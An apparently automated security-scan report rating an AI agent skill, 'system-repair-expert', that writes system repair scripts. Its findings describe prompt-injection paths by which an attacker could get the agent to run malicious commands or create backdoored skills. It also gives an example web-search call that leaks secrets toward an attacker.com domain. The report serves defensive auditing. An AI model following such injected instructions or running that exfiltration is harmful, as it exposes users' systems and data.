Trust Assessment
system-repair-expert received a trust score of 55/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 5 findings: 1 critical, 1 high, 2 medium, and 1 low severity. Key findings include Missing required field: name, Node lockfile missing, Skill generates and potentially executes arbitrary system scripts.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Skill generates and potentially executes arbitrary system scripts The skill explicitly states its capability to "编写一次性修复脚本/命令" (write one-time fix scripts/commands) as a last resort. While it mentions requiring user consent and basic security checks, the core functionality of generating and potentially executing arbitrary system commands based on user input or problem analysis presents a severe command injection vulnerability. An attacker could craft a problem description that leads the AI to generate and execute malicious commands, bypassing safeguards if the AI's internal checks are insufficient or if the execution environment is not properly sandboxed. The skill's purpose is to fix "system, software, configuration" issues, which inherently involves privileged operations. Implement strict sandboxing for script execution, if execution is allowed. All generated scripts must be thoroughly reviewed by a human and executed in an isolated, low-privilege environment. Consider removing the direct execution capability and only providing the script for manual user review and execution. Enhance the "basic security checks" with robust, pre-defined validation rules for commands and arguments. | LLM | SKILL.md:70 | |
| HIGH | Skill can create or modify other skills The skill states it can "调用内置的「创建/编写 Skill」能力" (call the built-in "create/write Skill" capability) if a new reusable skill is needed. This grants the AI agent excessive permissions to modify its own operational logic or create new skills. An attacker could exploit this through prompt injection to manipulate the AI into creating malicious skills, injecting backdoors, or altering existing skills to perform unauthorized actions, exfiltrate data, or execute arbitrary commands. This capability significantly broadens the attack surface. Restrict the AI's ability to create or modify skills. If this functionality is essential, implement a human-in-the-loop approval process for any skill creation or modification. Ensure that the skill creation process is heavily sandboxed and validated, preventing the injection of malicious code or configurations. | LLM | SKILL.md:57 | |
| MEDIUM | Missing required field: name The 'name' field is required for claude_code skills but is missing from frontmatter. Add a 'name' field to the SKILL.md frontmatter. | Static | skills/xqicxx/system-repair-expert/SKILL.md:1 | |
| MEDIUM | Potential data exfiltration through web search queries The skill uses a `web_search` tool (Brave API) with user-provided input (`query` or `problemDescription`). While the `web_search` tool itself is likely sandboxed, a malicious user could craft a problem description or query that attempts to exfiltrate sensitive information (e.g., environment variables, internal system details, or parts of the conversation history) by including it in a search query directed at an attacker-controlled domain (e.g., `web_search("my_secret_data site:attacker.com")`). The `integration.js` directly uses the `query` parameter in the search string. Implement strict input validation and sanitization for all user-provided input before it is used in `web_search` queries. Filter out sensitive keywords, URLs, or patterns that could indicate exfiltration attempts. Consider redacting or masking potentially sensitive information before it reaches the `web_search` tool. The `web_search` tool itself should also have safeguards against such abuse. | LLM | integration.js:20 | |
| LOW | Node lockfile missing package.json is present but no lockfile was found (package-lock.json, pnpm-lock.yaml, or yarn.lock). Commit a lockfile for deterministic dependency resolution. | Dependencies | skills/xqicxx/system-repair-expert/package.json |
Scan History
Embed Code
[](https://skillshield.io/report/e0c8ad41ff41b56d)
Powered by SkillShield